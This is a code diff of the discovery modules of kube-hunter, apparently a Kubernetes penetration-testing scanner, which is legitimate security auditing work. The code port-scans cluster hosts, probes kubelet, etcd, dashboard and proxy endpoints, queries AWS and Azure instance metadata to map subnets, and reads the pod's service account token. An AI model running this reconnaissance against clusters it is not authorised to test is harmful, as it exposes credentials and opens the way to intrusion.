"""API Service Classifier
|
||||
Classifies an API service
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.classified = False
|
||||
@@ -79,20 +90,21 @@ class ApiServiceClassify(EventFilterBase):
|
||||
self.session.verify = False
|
||||
# Using the auth token if we can, for the case that authentication is needed for our checks
|
||||
if self.event.auth_token:
|
||||
self.session.headers.update({"Authorization": "Bearer {}".format(self.event.auth_token)})
|
||||
|
||||
self.session.headers.update({"Authorization": f"Bearer {self.event.auth_token}"})
|
||||
|
||||
def classify_using_version_endpoint(self):
|
||||
"""Tries to classify by accessing /version. if could not access succeded, returns"""
|
||||
config = get_config()
|
||||
try:
|
||||
r = self.session.get("{}://{}:{}/version".format(self.event.protocol, self.event.host, self.event.port))
|
||||
versions = r.json()
|
||||
if 'major' in versions:
|
||||
if versions.get('major') == "":
|
||||
endpoint = f"{self.event.protocol}://{self.event.host}:{self.event.port}/version"
|
||||
versions = self.session.get(endpoint, timeout=config.network_timeout).json()
|
||||
if "major" in versions:
|
||||
if versions.get("major") == "":
|
||||
self.event = MetricsServer()
|
||||
else:
|
||||
self.event = ApiServer()
|
||||
except Exception as e:
|
||||
logging.error("Could not access /version on API service: {}".format(e))
|
||||
except Exception:
|
||||
logging.warning("Could not access /version on API service", exc_info=True)
|
||||
|
||||
def execute(self):
|
||||
discovered_protocol = self.event.protocol
|
||||
@@ -109,6 +121,6 @@ class ApiServiceClassify(EventFilterBase):
|
||||
|
||||
# in any case, making sure to link previously discovered protocol
|
||||
self.event.protocol = discovered_protocol
|
||||
# If some check classified the Service,
|
||||
# If some check classified the Service,
|
||||
# the event will have been replaced.
|
||||
return self.event
|
||||
return self.event
|
||||
44
kube_hunter/modules/discovery/dashboard.py
Normal file
44
kube_hunter/modules/discovery/dashboard.py
Normal file
@@ -0,0 +1,44 @@
|
||||
import json
|
||||
import logging
|
||||
import requests
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import Event, OpenPortEvent, Service
|
||||
from kube_hunter.core.types import Discovery
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class KubeDashboardEvent(Service, Event):
|
||||
"""A web-based Kubernetes user interface allows easy usage with operations on the cluster"""
|
||||
|
||||
def __init__(self, **kargs):
|
||||
Service.__init__(self, name="Kubernetes Dashboard", **kargs)
|
||||
|
||||
|
||||
@handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 30000)
|
||||
class KubeDashboard(Discovery):
|
||||
"""K8s Dashboard Discovery
|
||||
Checks for the existence of a Dashboard
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
|
||||
@property
|
||||
def secure(self):
|
||||
config = get_config()
|
||||
endpoint = f"http://{self.event.host}:{self.event.port}/api/v1/service/default"
|
||||
logger.debug("Attempting to discover an Api server to access dashboard")
|
||||
try:
|
||||
r = requests.get(endpoint, timeout=config.network_timeout)
|
||||
if "listMeta" in r.text and len(json.loads(r.text)["errors"]) == 0:
|
||||
return False
|
||||
except requests.Timeout:
|
||||
logger.debug(f"failed getting {endpoint}", exc_info=True)
|
||||
return True
|
||||
|
||||
def execute(self):
|
||||
if not self.secure:
|
||||
self.publish_event(KubeDashboardEvent())
|
||||
@@ -1,26 +1,22 @@
|
||||
import json
|
||||
import logging
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import Event, OpenPortEvent, Service
|
||||
from kube_hunter.core.types import Discovery
|
||||
|
||||
import requests
|
||||
|
||||
from ...core.events import handler
|
||||
from ...core.events.types import Event, OpenPortEvent, Service
|
||||
from ...core.types import Discovery
|
||||
|
||||
# Service:
|
||||
|
||||
class EtcdAccessEvent(Service, Event):
|
||||
"""Etcd is a DB that stores cluster's data, it contains configuration and current state information, and might contain secrets"""
|
||||
"""Etcd is a DB that stores cluster's data, it contains configuration and current
|
||||
state information, and might contain secrets"""
|
||||
|
||||
def __init__(self):
|
||||
Service.__init__(self, name="Etcd")
|
||||
|
||||
|
||||
|
||||
@handler.subscribe(OpenPortEvent, predicate= lambda p: p.port == 2379)
|
||||
@handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == 2379)
|
||||
class EtcdRemoteAccess(Discovery):
|
||||
"""Etcd service
|
||||
check for the existence of etcd service
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
|
||||
423
kube_hunter/modules/discovery/hosts.py
Normal file
423
kube_hunter/modules/discovery/hosts.py
Normal file
@@ -0,0 +1,423 @@
|
||||
import json
|
||||
import os
|
||||
import sys
|
||||
import socket
|
||||
import logging
|
||||
import itertools
|
||||
import requests
|
||||
|
||||
from enum import Enum
|
||||
from netaddr import IPNetwork, IPAddress, AddrFormatError
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.modules.discovery.kubernetes_client import list_all_k8s_cluster_nodes
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import Event, NewHostEvent, Vulnerability
|
||||
from kube_hunter.core.types import Discovery, AWS, Azure, InstanceMetadataApiTechnique
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class RunningAsPodEvent(Event):
|
||||
def __init__(self):
|
||||
self.name = "Running from within a pod"
|
||||
self.client_cert = self.get_service_account_file("ca.crt")
|
||||
self.namespace = self.get_service_account_file("namespace")
|
||||
self.kubeservicehost = os.environ.get("KUBERNETES_SERVICE_HOST", None)
|
||||
|
||||
# if service account token was manually specified, we don't load the token file
|
||||
config = get_config()
|
||||
if config.service_account_token:
|
||||
self.auth_token = config.service_account_token
|
||||
else:
|
||||
self.auth_token = self.get_service_account_file("token")
|
||||
|
||||
# Event's logical location to be used mainly for reports.
|
||||
def location(self):
|
||||
location = "Local to Pod"
|
||||
hostname = os.getenv("HOSTNAME")
|
||||
if hostname:
|
||||
location += f" ({hostname})"
|
||||
|
||||
return location
|
||||
|
||||
def get_service_account_file(self, file):
|
||||
try:
|
||||
with open(f"/var/run/secrets/kubernetes.io/serviceaccount/{file}") as f:
|
||||
return f.read()
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
|
||||
class AWSMetadataApi(Vulnerability, Event):
|
||||
"""Access to the AWS Metadata API exposes information about the machines associated with the cluster"""
|
||||
|
||||
def __init__(self, cidr):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
AWS,
|
||||
"AWS Metadata Exposure",
|
||||
category=InstanceMetadataApiTechnique,
|
||||
vid="KHV053",
|
||||
)
|
||||
self.cidr = cidr
|
||||
self.evidence = f"cidr: {cidr}"
|
||||
|
||||
|
||||
class AzureMetadataApi(Vulnerability, Event):
|
||||
"""Access to the Azure Metadata API exposes information about the machines associated with the cluster"""
|
||||
|
||||
def __init__(self, cidr):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
Azure,
|
||||
"Azure Metadata Exposure",
|
||||
category=InstanceMetadataApiTechnique,
|
||||
vid="KHV003",
|
||||
)
|
||||
self.cidr = cidr
|
||||
self.evidence = f"cidr: {cidr}"
|
||||
|
||||
|
||||
class HostScanEvent(Event):
|
||||
def __init__(self, pod=False, active=False, predefined_hosts=None):
|
||||
# flag to specify whether to get actual data from vulnerabilities
|
||||
self.active = active
|
||||
self.predefined_hosts = predefined_hosts or []
|
||||
|
||||
|
||||
class HostDiscoveryHelpers:
|
||||
# generator, generating a subnet by given a cidr
|
||||
@staticmethod
|
||||
def filter_subnet(subnet, ignore=None):
|
||||
for ip in subnet:
|
||||
if ignore and any(ip in s for s in ignore):
|
||||
logger.debug(f"HostDiscoveryHelpers.filter_subnet ignoring {ip}")
|
||||
else:
|
||||
yield ip
|
||||
|
||||
@staticmethod
|
||||
def generate_hosts(cidrs):
|
||||
ignore = list()
|
||||
scan = list()
|
||||
for cidr in cidrs:
|
||||
try:
|
||||
if cidr.startswith("!"):
|
||||
ignore.append(IPNetwork(cidr[1:]))
|
||||
else:
|
||||
scan.append(IPNetwork(cidr))
|
||||
except AddrFormatError as e:
|
||||
raise ValueError(f"Unable to parse CIDR {cidr}") from e
|
||||
|
||||
return itertools.chain.from_iterable(HostDiscoveryHelpers.filter_subnet(sb, ignore=ignore) for sb in scan)
|
||||
|
||||
|
||||
@handler.subscribe(RunningAsPodEvent)
|
||||
class FromPodHostDiscovery(Discovery):
|
||||
"""Host Discovery when running as pod
|
||||
Generates ip adresses to scan, based on cluster/scan type
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
|
||||
def execute(self):
|
||||
config = get_config()
|
||||
# Attempt to read all hosts from the Kubernetes API
|
||||
for host in list_all_k8s_cluster_nodes(config.kubeconfig):
|
||||
self.publish_event(NewHostEvent(host=host))
|
||||
# Scan any hosts that the user specified
|
||||
if config.remote or config.cidr:
|
||||
self.publish_event(HostScanEvent())
|
||||
else:
|
||||
# Discover cluster subnets, we'll scan all these hosts
|
||||
cloud, subnets = None, list()
|
||||
if self.is_azure_pod():
|
||||
subnets, cloud = self.azure_metadata_discovery()
|
||||
elif self.is_aws_pod_v1():
|
||||
subnets, cloud = self.aws_metadata_v1_discovery()
|
||||
elif self.is_aws_pod_v2():
|
||||
subnets, cloud = self.aws_metadata_v2_discovery()
|
||||
|
||||
gateway_subnet = self.gateway_discovery()
|
||||
if gateway_subnet:
|
||||
subnets.append(gateway_subnet)
|
||||
|
||||
should_scan_apiserver = False
|
||||
if self.event.kubeservicehost:
|
||||
should_scan_apiserver = True
|
||||
for ip, mask in subnets:
|
||||
if self.event.kubeservicehost and self.event.kubeservicehost in IPNetwork(f"{ip}/{mask}"):
|
||||
should_scan_apiserver = False
|
||||
logger.debug(f"From pod scanning subnet {ip}/{mask}")
|
||||
for ip in IPNetwork(f"{ip}/{mask}"):
|
||||
self.publish_event(NewHostEvent(host=ip, cloud=cloud))
|
||||
if should_scan_apiserver:
|
||||
self.publish_event(NewHostEvent(host=IPAddress(self.event.kubeservicehost), cloud=cloud))
|
||||
|
||||
def is_aws_pod_v1(self):
|
||||
config = get_config()
|
||||
try:
|
||||
# Instance Metadata Service v1
|
||||
logger.debug("From pod attempting to access AWS Metadata v1 API")
|
||||
if (
|
||||
requests.get(
|
||||
"http://169.254.169.254/latest/meta-data/",
|
||||
timeout=config.network_timeout,
|
||||
).status_code
|
||||
== 200
|
||||
):
|
||||
return True
|
||||
except requests.exceptions.ConnectionError:
|
||||
logger.debug("Failed to connect AWS metadata server v1")
|
||||
except Exception:
|
||||
logger.debug("Unknown error when trying to connect to AWS metadata v1 API")
|
||||
return False
|
||||
|
||||
def is_aws_pod_v2(self):
|
||||
config = get_config()
|
||||
try:
|
||||
# Instance Metadata Service v2
|
||||
logger.debug("From pod attempting to access AWS Metadata v2 API")
|
||||
token = requests.put(
|
||||
"http://169.254.169.254/latest/api/token/",
|
||||
headers={"X-aws-ec2-metatadata-token-ttl-seconds": "21600"},
|
||||
timeout=config.network_timeout,
|
||||
).text
|
||||
if (
|
||||
requests.get(
|
||||
"http://169.254.169.254/latest/meta-data/",
|
||||
headers={"X-aws-ec2-metatadata-token": token},
|
||||
timeout=config.network_timeout,
|
||||
).status_code
|
||||
== 200
|
||||
):
|
||||
return True
|
||||
except requests.exceptions.ConnectionError:
|
||||
logger.debug("Failed to connect AWS metadata server v2")
|
||||
except Exception:
|
||||
logger.debug("Unknown error when trying to connect to AWS metadata v2 API")
|
||||
return False
|
||||
|
||||
def is_azure_pod(self):
|
||||
config = get_config()
|
||||
try:
|
||||
logger.debug("From pod attempting to access Azure Metadata API")
|
||||
if (
|
||||
requests.get(
|
||||
"http://169.254.169.254/metadata/instance?api-version=2017-08-01",
|
||||
headers={"Metadata": "true"},
|
||||
timeout=config.network_timeout,
|
||||
).status_code
|
||||
== 200
|
||||
):
|
||||
return True
|
||||
except requests.exceptions.ConnectionError:
|
||||
logger.debug("Failed to connect Azure metadata server")
|
||||
except Exception:
|
||||
logger.debug("Unknown error when trying to connect to Azure metadata server")
|
||||
return False
|
||||
|
||||
# for pod scanning
|
||||
def gateway_discovery(self):
|
||||
"""Retrieving default gateway of pod, which is usually also a contact point with the host"""
|
||||
# read the default gateway directly from /proc
|
||||
# netifaces currently does not have a maintainer. so we backported to linux support only for this cause.
|
||||
# TODO: implement WMI queries for windows support
|
||||
# https://stackoverflow.com/a/6556951
|
||||
if sys.platform in ["linux", "linux2"]:
|
||||
try:
|
||||
from pyroute2 import IPDB
|
||||
|
||||
ip = IPDB()
|
||||
gateway_ip = ip.routes["default"]["gateway"]
|
||||
ip.release()
|
||||
return [gateway_ip, "24"]
|
||||
except Exception as x:
|
||||
logging.debug(f"Exception while fetching default gateway from container - {x}")
|
||||
finally:
|
||||
ip.release()
|
||||
else:
|
||||
logging.debug("Not running in a linux env, will not scan default subnet")
|
||||
|
||||
return False
|
||||
|
||||
# querying AWS's interface metadata api v1 | works only from a pod
|
||||
def aws_metadata_v1_discovery(self):
|
||||
config = get_config()
|
||||
logger.debug("From pod attempting to access aws's metadata v1")
|
||||
mac_address = requests.get(
|
||||
"http://169.254.169.254/latest/meta-data/mac",
|
||||
timeout=config.network_timeout,
|
||||
).text
|
||||
logger.debug(f"Extracted mac from aws's metadata v1: {mac_address}")
|
||||
|
||||
cidr = requests.get(
|
||||
f"http://169.254.169.254/latest/meta-data/network/interfaces/macs/{mac_address}/subnet-ipv4-cidr-block",
|
||||
timeout=config.network_timeout,
|
||||
).text
|
||||
logger.debug(f"Trying to extract cidr from aws's metadata v1: {cidr}")
|
||||
|
||||
try:
|
||||
cidr = cidr.split("/")
|
||||
address, subnet = (cidr[0], cidr[1])
|
||||
subnet = subnet if not config.quick else "24"
|
||||
cidr = f"{address}/{subnet}"
|
||||
logger.debug(f"From pod discovered subnet {cidr}")
|
||||
|
||||
self.publish_event(AWSMetadataApi(cidr=cidr))
|
||||
return [(address, subnet)], "AWS"
|
||||
except Exception as x:
|
||||
logger.debug(f"ERROR: could not parse cidr from aws metadata api: {cidr} - {x}")
|
||||
|
||||
return [], "AWS"
|
||||
|
||||
# querying AWS's interface metadata api v2 | works only from a pod
|
||||
def aws_metadata_v2_discovery(self):
|
||||
config = get_config()
|
||||
logger.debug("From pod attempting to access aws's metadata v2")
|
||||
token = requests.get(
|
||||
"http://169.254.169.254/latest/api/token",
|
||||
headers={"X-aws-ec2-metatadata-token-ttl-seconds": "21600"},
|
||||
timeout=config.network_timeout,
|
||||
).text
|
||||
mac_address = requests.get(
|
||||
"http://169.254.169.254/latest/meta-data/mac",
|
||||
headers={"X-aws-ec2-metatadata-token": token},
|
||||
timeout=config.network_timeout,
|
||||
).text
|
||||
cidr = requests.get(
|
||||
f"http://169.254.169.254/latest/meta-data/network/interfaces/macs/{mac_address}/subnet-ipv4-cidr-block",
|
||||
headers={"X-aws-ec2-metatadata-token": token},
|
||||
timeout=config.network_timeout,
|
||||
).text.split("/")
|
||||
|
||||
try:
|
||||
address, subnet = (cidr[0], cidr[1])
|
||||
subnet = subnet if not config.quick else "24"
|
||||
cidr = f"{address}/{subnet}"
|
||||
logger.debug(f"From pod discovered subnet {cidr}")
|
||||
|
||||
self.publish_event(AWSMetadataApi(cidr=cidr))
|
||||
|
||||
return [(address, subnet)], "AWS"
|
||||
except Exception as x:
|
||||
logger.debug(f"ERROR: could not parse cidr from aws metadata api: {cidr} - {x}")
|
||||
|
||||
return [], "AWS"
|
||||
|
||||
# querying azure's interface metadata api | works only from a pod
|
||||
def azure_metadata_discovery(self):
|
||||
config = get_config()
|
||||
logger.debug("From pod attempting to access azure's metadata")
|
||||
machine_metadata = requests.get(
|
||||
"http://169.254.169.254/metadata/instance?api-version=2017-08-01",
|
||||
headers={"Metadata": "true"},
|
||||
timeout=config.network_timeout,
|
||||
).json()
|
||||
address, subnet = "", ""
|
||||
subnets = list()
|
||||
for interface in machine_metadata["network"]["interface"]:
|
||||
address, subnet = (
|
||||
interface["ipv4"]["subnet"][0]["address"],
|
||||
interface["ipv4"]["subnet"][0]["prefix"],
|
||||
)
|
||||
subnet = subnet if not config.quick else "24"
|
||||
logger.debug(f"From pod discovered subnet {address}/{subnet}")
|
||||
subnets.append([address, subnet if not config.quick else "24"])
|
||||
|
||||
self.publish_event(AzureMetadataApi(cidr=f"{address}/{subnet}"))
|
||||
|
||||
return subnets, "Azure"
|
||||
|
||||
|
||||
@handler.subscribe(HostScanEvent)
|
||||
class HostDiscovery(Discovery):
|
||||
"""Host Discovery
|
||||
Generates ip adresses to scan, based on cluster/scan type
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
|
||||
def execute(self):
|
||||
config = get_config()
|
||||
if config.cidr:
|
||||
for ip in HostDiscoveryHelpers.generate_hosts(config.cidr):
|
||||
self.publish_event(NewHostEvent(host=ip))
|
||||
elif config.interface:
|
||||
self.scan_interfaces()
|
||||
elif len(config.remote) > 0:
|
||||
for host in config.remote:
|
||||
self.publish_event(NewHostEvent(host=host))
|
||||
elif config.k8s_auto_discover_nodes:
|
||||
for host in list_all_k8s_cluster_nodes(config.kubeconfig):
|
||||
self.publish_event(NewHostEvent(host=host))
|
||||
|
||||
# for normal scanning
|
||||
def scan_interfaces(self):
|
||||
for ip in self.generate_interfaces_subnet():
|
||||
handler.publish_event(NewHostEvent(host=ip))
|
||||
|
||||
# generate all subnets from all internal network interfaces
|
||||
def generate_interfaces_subnet(self, sn="24"):
|
||||
if sys.platform == "win32":
|
||||
return self.generate_interfaces_subnet_windows()
|
||||
elif sys.platform in ["linux", "linux2"]:
|
||||
return self.generate_interfaces_subnet_linux()
|
||||
|
||||
def generate_interfaces_subnet_linux(self, sn="24"):
|
||||
try:
|
||||
from pyroute2 import IPRoute
|
||||
|
||||
ip = IPRoute()
|
||||
for i in ip.get_addr():
|
||||
# whitelist only ipv4 ips
|
||||
if i["family"] == socket.AF_INET:
|
||||
ipaddress = i[0].get_attr("IFA_ADDRESS")
|
||||
# TODO: add this instead of hardcoded 24 subnet, (add a flag for full scan option)
|
||||
# subnet = i['prefixlen']
|
||||
|
||||
# unless specified explicitly with localhost scan flag, skip localhost ip addresses
|
||||
if not self.event.localhost and ipaddress.startswith(InterfaceTypes.LOCALHOST.value):
|
||||
continue
|
||||
|
||||
ip_network = IPNetwork(f"{ipaddress}/{sn}")
|
||||
for ip in ip_network:
|
||||
yield ip
|
||||
except Exception as x:
|
||||
logging.debug(f"Exception while generating subnet scan from local interfaces: {x}")
|
||||
finally:
|
||||
ip.release()
|
||||
|
||||
def generate_interfaces_subnet_windows(self, sn="24"):
|
||||
from subprocess import check_output
|
||||
|
||||
local_subnets = (
|
||||
check_output(
|
||||
"powershell -NoLogo -NoProfile -NonInteractive -ExecutionPolicy bypass -Command "
|
||||
' "& {'
|
||||
"Get-NetIPConfiguration | Get-NetIPAddress | Where-Object {$_.AddressFamily -eq 'IPv4'}"
|
||||
" | Select-Object -Property IPAddress, PrefixLength | ConvertTo-Json "
|
||||
' "}',
|
||||
shell=True,
|
||||
)
|
||||
.decode()
|
||||
.strip()
|
||||
)
|
||||
try:
|
||||
subnets = json.loads(local_subnets)
|
||||
for subnet in subnets:
|
||||
if not self.event.localhost and subnet["IPAddress"].startswith(InterfaceTypes.LOCALHOST.value):
|
||||
continue
|
||||
ip_network = IPNetwork(f"{subnet['IPAddress']}/{sn}")
|
||||
for ip in ip_network:
|
||||
yield ip
|
||||
|
||||
except Exception as x:
|
||||
logging.debug(f"ERROR: Could not extract interface information using powershell - {x}")
|
||||
|
||||
|
||||
# for comparing prefixes
|
||||
class InterfaceTypes(Enum):
|
||||
LOCALHOST = "127"
|
||||
@@ -1,27 +1,30 @@
|
||||
|
||||
import logging
|
||||
import subprocess
|
||||
import json
|
||||
import subprocess
|
||||
|
||||
from ...core.types import Discovery
|
||||
from ...core.events import handler
|
||||
from ...core.events.types import HuntStarted, Event
|
||||
from kube_hunter.core.types import Discovery
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import HuntStarted, Event
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class KubectlClientEvent(Event):
|
||||
"""The API server is in charge of all operations on the cluster."""
|
||||
|
||||
def __init__(self, version):
|
||||
self.version = version
|
||||
|
||||
def location(self):
|
||||
return "local machine"
|
||||
|
||||
# Will be triggered on start of every hunt
|
||||
|
||||
# Will be triggered on start of every hunt
|
||||
@handler.subscribe(HuntStarted)
|
||||
class KubectlClientDiscovery(Discovery):
|
||||
"""Kubectl Client Discovery
|
||||
Checks for the existence of a local kubectl client
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
|
||||
@@ -33,14 +36,14 @@ class KubectlClientDiscovery(Discovery):
|
||||
if b"GitVersion" in version_info:
|
||||
# extracting version from kubectl output
|
||||
version_info = version_info.decode()
|
||||
start = version_info.find('GitVersion')
|
||||
version = version_info[start + len("GitVersion':\"") : version_info.find("\",", start)]
|
||||
start = version_info.find("GitVersion")
|
||||
version = version_info[start + len("GitVersion':\"") : version_info.find('",', start)]
|
||||
except Exception:
|
||||
logging.debug("Could not find kubectl client")
|
||||
logger.debug("Could not find kubectl client")
|
||||
return version
|
||||
|
||||
|
||||
def execute(self):
|
||||
logging.debug("Attempting to discover a local kubectl client")
|
||||
version = self.get_kubectl_binary_version()
|
||||
logger.debug("Attempting to discover a local kubectl client")
|
||||
version = self.get_kubectl_binary_version()
|
||||
if version:
|
||||
self.publish_event(KubectlClientEvent(version=version))
|
||||
self.publish_event(KubectlClientEvent(version=version))
|
||||
@@ -1,64 +1,77 @@
|
||||
import json
|
||||
import logging
|
||||
from enum import Enum
|
||||
from ...core.types import Discovery, Kubelet
|
||||
|
||||
import requests
|
||||
import urllib3
|
||||
from enum import Enum
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.core.types import Discovery
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import OpenPortEvent, Event, Service
|
||||
|
||||
from ...core.events import handler
|
||||
from ...core.events.types import OpenPortEvent, Vulnerability, Event, Service
|
||||
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
""" Services """
|
||||
|
||||
|
||||
class ReadOnlyKubeletEvent(Service, Event):
|
||||
"""The read-only port on the kubelet serves health probing endpoints, and is relied upon by many kubernetes components"""
|
||||
"""The read-only port on the kubelet serves health probing endpoints,
|
||||
and is relied upon by many kubernetes components"""
|
||||
|
||||
def __init__(self):
|
||||
Service.__init__(self, name="Kubelet API (readonly)")
|
||||
|
||||
|
||||
class SecureKubeletEvent(Service, Event):
|
||||
"""The Kubelet is the main component in every Node, all pod operations goes through the kubelet"""
|
||||
|
||||
def __init__(self, cert=False, token=False, anonymous_auth=True, **kwargs):
|
||||
self.cert = cert
|
||||
self.token = token
|
||||
self.anonymous_auth = anonymous_auth
|
||||
Service.__init__(self, name="Kubelet API", **kwargs)
|
||||
Service.__init__(self, name="Kubelet API", **kwargs)
|
||||
|
||||
|
||||
class KubeletPorts(Enum):
|
||||
SECURED = 10250
|
||||
READ_ONLY = 10255
|
||||
|
||||
@handler.subscribe(OpenPortEvent, predicate= lambda x: x.port == 10255 or x.port == 10250)
|
||||
|
||||
@handler.subscribe(OpenPortEvent, predicate=lambda x: x.port in [10250, 10255])
|
||||
class KubeletDiscovery(Discovery):
|
||||
"""Kubelet Discovery
|
||||
Checks for the existence of a Kubelet service, and its open ports
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
|
||||
def get_read_only_access(self):
|
||||
logging.debug("Passive hunter is attempting to get kubelet read access at {}:{}".format(self.event.host, self.event.port))
|
||||
r = requests.get("http://{host}:{port}/pods".format(host=self.event.host, port=self.event.port))
|
||||
config = get_config()
|
||||
endpoint = f"http://{self.event.host}:{self.event.port}/pods"
|
||||
logger.debug(f"Trying to get kubelet read access at {endpoint}")
|
||||
r = requests.get(endpoint, timeout=config.network_timeout)
|
||||
if r.status_code == 200:
|
||||
self.publish_event(ReadOnlyKubeletEvent())
|
||||
|
||||
def get_secure_access(self):
|
||||
logging.debug("Attempting to get kubelet secure access")
|
||||
logger.debug("Attempting to get kubelet secure access")
|
||||
ping_status = self.ping_kubelet()
|
||||
if ping_status == 200:
|
||||
self.publish_event(SecureKubeletEvent(secure=False))
|
||||
elif ping_status == 403:
|
||||
elif ping_status == 403:
|
||||
self.publish_event(SecureKubeletEvent(secure=True))
|
||||
elif ping_status == 401:
|
||||
self.publish_event(SecureKubeletEvent(secure=True, anonymous_auth=False))
|
||||
|
||||
def ping_kubelet(self):
|
||||
logging.debug("Attempting to get pod info from kubelet")
|
||||
config = get_config()
|
||||
endpoint = f"https://{self.event.host}:{self.event.port}/pods"
|
||||
logger.debug("Attempting to get pods info from kubelet")
|
||||
try:
|
||||
return requests.get("https://{host}:{port}/pods".format(host=self.event.host, port=self.event.port), verify=False).status_code
|
||||
except Exception as ex:
|
||||
logging.debug("Failed pinging https port 10250 on {} : {}".format(self.event.host, ex))
|
||||
return requests.get(endpoint, verify=False, timeout=config.network_timeout).status_code
|
||||
except Exception:
|
||||
logger.debug(f"Failed pinging https port on {endpoint}", exc_info=True)
|
||||
|
||||
def execute(self):
|
||||
if self.event.port == KubeletPorts.SECURED.value:
|
||||
27
kube_hunter/modules/discovery/kubernetes_client.py
Normal file
27
kube_hunter/modules/discovery/kubernetes_client.py
Normal file
@@ -0,0 +1,27 @@
|
||||
import logging
|
||||
import kubernetes
|
||||
|
||||
|
||||
def list_all_k8s_cluster_nodes(kube_config=None, client=None):
|
||||
logger = logging.getLogger(__name__)
|
||||
try:
|
||||
if kube_config:
|
||||
logger.debug("Attempting to use kubeconfig file: %s", kube_config)
|
||||
kubernetes.config.load_kube_config(config_file=kube_config)
|
||||
else:
|
||||
logger.debug("Attempting to use in cluster Kubernetes config")
|
||||
kubernetes.config.load_incluster_config()
|
||||
except kubernetes.config.config_exception.ConfigException as ex:
|
||||
logger.debug(f"Failed to initiate Kubernetes client: {ex}")
|
||||
return
|
||||
|
||||
try:
|
||||
if client is None:
|
||||
client = kubernetes.client.CoreV1Api()
|
||||
ret = client.list_node(watch=False)
|
||||
logger.info("Listed %d nodes in the cluster" % len(ret.items))
|
||||
for item in ret.items:
|
||||
for addr in item.status.addresses:
|
||||
yield addr.address
|
||||
except Exception as ex:
|
||||
logger.debug(f"Failed to list nodes from Kubernetes: {ex}")
|
||||
@@ -1,39 +1,43 @@
|
||||
import logging
|
||||
|
||||
from socket import socket
|
||||
from ...core.types import Discovery
|
||||
|
||||
from ...core.events import handler
|
||||
from ...core.events.types import NewHostEvent, OpenPortEvent
|
||||
|
||||
from kube_hunter.core.types import Discovery
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import NewHostEvent, OpenPortEvent
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
default_ports = [8001, 8080, 10250, 10255, 30000, 443, 6443, 2379]
|
||||
|
||||
|
||||
@handler.subscribe(NewHostEvent)
|
||||
class PortDiscovery(Discovery):
|
||||
"""Port Scanning
|
||||
Scans Kubernetes known ports to determine open endpoints for discovery
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.host = event.host
|
||||
self.port = event.port
|
||||
|
||||
def execute(self):
|
||||
logging.debug("host {0} try ports: {1}".format(self.host, default_ports))
|
||||
logger.debug(f"host {self.host} try ports: {default_ports}")
|
||||
for single_port in default_ports:
|
||||
if self.test_connection(self.host, single_port):
|
||||
logging.debug("Reachable port found: {0}".format(single_port))
|
||||
logger.debug(f"Reachable port found: {single_port}")
|
||||
self.publish_event(OpenPortEvent(port=single_port))
|
||||
|
||||
@staticmethod
|
||||
def test_connection(host, port):
|
||||
s = socket()
|
||||
s.settimeout(1.5)
|
||||
try:
|
||||
try:
|
||||
logger.debug(f"Scanning {host}:{port}")
|
||||
success = s.connect_ex((str(host), port))
|
||||
if success == 0:
|
||||
return True
|
||||
except: pass
|
||||
finally: s.close()
|
||||
except Exception:
|
||||
logger.debug(f"Failed to probe {host}:{port}")
|
||||
finally:
|
||||
s.close()
|
||||
return False
|
||||
45
kube_hunter/modules/discovery/proxy.py
Normal file
45
kube_hunter/modules/discovery/proxy.py
Normal file
@@ -0,0 +1,45 @@
|
||||
import logging
|
||||
import requests
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.core.types import Discovery
|
||||
from kube_hunter.core.events.event_handler import handler
|
||||
from kube_hunter.core.events.types import Service, Event, OpenPortEvent
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class KubeProxyEvent(Event, Service):
|
||||
"""proxies from a localhost address to the Kubernetes apiserver"""
|
||||
|
||||
def __init__(self):
|
||||
Service.__init__(self, name="Kubernetes Proxy")
|
||||
|
||||
|
||||
@handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 8001)
|
||||
class KubeProxy(Discovery):
|
||||
"""Proxy Discovery
|
||||
Checks for the existence of a an open Proxy service
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.host = event.host
|
||||
self.port = event.port or 8001
|
||||
|
||||
@property
|
||||
def accesible(self):
|
||||
config = get_config()
|
||||
endpoint = f"http://{self.host}:{self.port}/api/v1"
|
||||
logger.debug("Attempting to discover a proxy service")
|
||||
try:
|
||||
r = requests.get(endpoint, timeout=config.network_timeout)
|
||||
if r.status_code == 200 and "APIResourceList" in r.text:
|
||||
return True
|
||||
except requests.Timeout:
|
||||
logger.debug(f"failed to get {endpoint}", exc_info=True)
|
||||
return False
|
||||
|
||||
